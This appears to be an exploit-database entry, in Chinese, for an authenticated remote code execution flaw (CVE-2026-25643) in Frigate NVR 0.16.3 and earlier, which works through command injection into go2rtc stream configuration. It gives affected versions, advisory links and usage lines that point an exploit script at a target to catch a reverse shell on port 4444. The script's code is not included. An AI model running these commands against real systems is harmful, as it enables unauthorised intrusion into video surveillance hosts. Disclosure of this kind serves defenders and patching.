漏洞标题: Frigate NVR <= 0.16.3 - 已认证远程代码执行
日期: 2026-02-05
漏洞作者: jduardo2704
厂商主页: https://frigate.video/
软件链接: https://github.com/blakeblackshear/frigate
版本: <= 0.16.3
CVE: CVE-2026-25643
安全公告: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Frigate 版本 0.16.3 及以下存在通过 go2rtc 配置导致的远程代码执行(RCE)漏洞。拥有认证访问权限的攻击者(若实例暴露,则未认证亦可)可利用 exec: 协议将系统命令注入流配置。此漏洞利用工具可自动完成载荷注入、重启服务并捕获反向 Shell。
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
此脚本仅用于教育目的及授权的安全测试。